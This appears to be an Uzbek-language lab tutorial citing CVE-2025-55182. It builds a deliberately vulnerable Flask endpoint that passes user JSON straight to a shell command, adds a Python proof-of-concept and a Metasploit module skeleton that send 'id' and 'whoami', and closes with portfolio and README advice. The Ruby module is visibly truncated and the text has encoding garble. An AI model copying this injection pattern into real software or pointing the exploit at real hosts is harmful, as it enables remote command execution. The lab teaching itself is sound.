Share
## https://sploitus.com/exploit?id=740C65EE-76C3-5625-B300-21580FA9F94A
## ๐Ÿงช 1-QADAM: Demo vulnerable web-app (LAB)

Biz CVE-2025-55182 ga oโ€˜xshash mantiq (unsafe server-side execution) yaratamiz.

๐Ÿ“ ```vuln_app/app.py```
```bash
from flask import Flask, request
import subprocess

app = Flask(__name__)

@app.route("/render", methods=["POST"])
def render():
    data = request.json.get("component")

    # โŒ VULNERABLE: user input to command execution
    result = subprocess.getoutput(data)
    return result

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=3000)
```


Ishga tushirish:
```bash
pip install flask
python app.py
```

## ๐Ÿ“Œ Bu React2Shellโ€™ga oโ€˜xshash:

server-side input โ†’ execution

## ๐Ÿงช 2-QADAM: Python PoC (test exploit)

Bu faqat RCE borligini isbotlash uchun.

๐Ÿ“ ```poc.py```
```bash
import requests

url = "http://127.0.0.1:3000/render"

payload = {
    "component": "id"
}

r = requests.post(url, json=payload)
print("[+] Server response:")
print(r.text)
```

Agar chiqsa:
```bash
uid=1000(user) gid=1000(user)
```

โœ… RCE CONFIRMED (LAB)

## ๐Ÿง  3-QADAM: Metasploit exploit SKELETON

Bu โ€” professional framework format, lekin weaponized emas.

๐Ÿ“ Joylashuvi
```bash
~/.msf4/modules/exploits/linux/http/lab_react_like_rce.rb
```
๐Ÿ“„ ```lab_react_like_rce.rb```
```bash
require 'msf/core'

class MetasploitModule  'LAB React-like Server RCE',
      'Description' => %q{
        Demonstration exploit for unsafe server-side execution.
        Tested only in a controlled lab environment.
      },
      'Author'      => ['Behruz'],
      'License'     => MSF_LICENSE,
      'Platform'    => ['linux'],
      'Arch'        => ARCH_CMD,
      'Targets'     => [['Automatic', {}]],
      'DisclosureDate' => '2025-01-01',
      'DefaultTarget'  => 0
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Vulnerable endpoint', '/render'])
    ])
  end

  def exploit
    print_status("Sending lab command execution request")

    send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path),
      'ctype'  => 'application/json',
      'data'   => {
        'component' => 'whoami'
      }.to_json
    })

    print_good("Request sent (LAB validation only)")
  end
end
```

Ishlatish:
```bash
msfconsole
use exploit/linux/http/lab_react_like_rce
set RHOSTS 127.0.0.1
run
```

๐Ÿ“Œ Bu yerda:

โŒ reverse shell yoโ€˜q

โœ… framework knowledge + exploit logic bor

## ๐Ÿ“ 4-QADAM: Portfolio struktura (MUHIM)

GitHubโ€™da shunday koโ€˜rinsin:
```bash
lab-react-like-rce/
 โ”œโ”€ vuln_app/
 โ”‚   โ””โ”€ app.py
 โ”œโ”€ poc/
 โ”‚   โ””โ”€ poc.py
 โ”œโ”€ metasploit/
 โ”‚   โ””โ”€ lab_react_like_rce.rb
 โ”œโ”€ README.md
```
## ๐Ÿ“ 5-QADAM: READMEโ€™da shunday yoziladi
```bash
## Description
This project demonstrates a lab-based server-side code execution
vulnerability inspired by modern RCE CVEs.

## Scope
- Tested only in a controlled lab environment
- No real-world systems were targeted

## Skills Demonstrated
- Vulnerability analysis
- Python PoC development
- Custom Metasploit module creation
```